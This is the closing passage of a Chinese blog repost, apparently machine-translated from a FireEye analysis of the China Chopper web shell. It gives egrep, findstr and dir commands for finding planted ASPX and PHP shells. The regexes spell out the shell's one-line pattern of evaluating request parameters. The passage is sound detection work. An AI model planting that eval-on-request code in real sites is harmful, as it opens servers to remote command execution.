                <pre style="color:#000000;text-transform:none;line-height:18px;text-indent:0px;letter-spacing:normal;font-size:12px;font-style:normal;font-variant:normal;font-weight:normal;word-spacing:0px;-webkit-text-stroke-width:0px;">egrep -re '[&lt;]\%\@\sPage\sLanguage=.Jscript.\%[&gt;][&lt;]\%eval.Request\.Item.+unsafe' *.aspx</pre>
                <pre style="color:#000000;text-transform:none;line-height:18px;text-indent:0px;letter-spacing:normal;font-size:12px;font-style:normal;font-variant:normal;font-weight:normal;word-spacing:0px;-webkit-text-stroke-width:0px;">findstr /R "[&lt;]\%\@.Page.Language=.Jscript.\%[&gt;][&lt;]\%eval.Request\.Item.*unsafe" *.aspx</pre>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">如果你不知道,所有的PHP或ASPX文件是在Windows主机上,可以使用dir命令的一些扩展选项,以帮助您确定您可能要运行我们的正则表达式对(见图12)Web文件。</p>
                <pre style="color:#000000;text-transform:none;line-height:18px;text-indent:0px;letter-spacing:normal;font-size:12px;font-style:normal;font-variant:normal;font-weight:normal;word-spacing:0px;-webkit-text-stroke-width:0px;">dir /S /A /B *.php</pre>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="510" height="135" class="alignnone size-full wp-image-2676 landscape-med" style="border:0px currentColor;border-image:none;" alt="image012" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image012.jpg" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image012.jpg"></a> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图12:通过Windows使用dir命令递归搜索<br> <br> &nbsp;<br> <br> FINDSTR还必须搜索所有的子目录(参见图13)的选项。</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><em></em> </p>
                <pre style="color:#000000;text-transform:none;line-height:18px;text-indent:0px;letter-spacing:normal;font-size:12px;font-style:normal;font-variant:normal;font-weight:normal;word-spacing:0px;-webkit-text-stroke-width:0px;">findstr /R /S "[&lt;][?]php.\@eval[(]\$_POST.*[)];[?][&gt;]" *.php</pre>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">&nbsp;</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><img width="782" height="213" class="alignnone size-full wp-image-2677 landscape-med" style="border:0px currentColor;border-image:none;" alt="image013" src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image013.jpg" data-ke-src="https://www.fireeye.com/content/dam/legacy/blog/2013/08/image013.jpg"></a> </p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;">图13:使用FINDSTR递归找到Web壳的多个实例<br> <br> &nbsp;<br> <br> 结论:<br> <br> 我希望中国斩波器的功能,平台的通用性,交付机制,流量分析和检测这个解释给你的知识和工具,你需要消除这种优雅的设计,但危险的威胁。</p>
                <p style="font:12px/18px &quot;margin:5px 0px;color:#000000;text-transform:none;text-indent:0px;letter-spacing:normal;word-spacing:0px;white-space:normal;-ms-word-wrap:break-word;-webkit-text-stroke-width:0px;"><br></p><br class="Apple-interchange-newline">

标签: shell 黑客工具 web安全 扫描

版权所有:Mrxn's Blog
文章标题:剖析中国菜刀第二部分
除非注明,文章均为 Mrxn's Blog 原创,请勿用于任何商业用途,转载请注明作者和出处 Mrxn's Blog

扫描二维码,在手机上阅读

推荐阅读: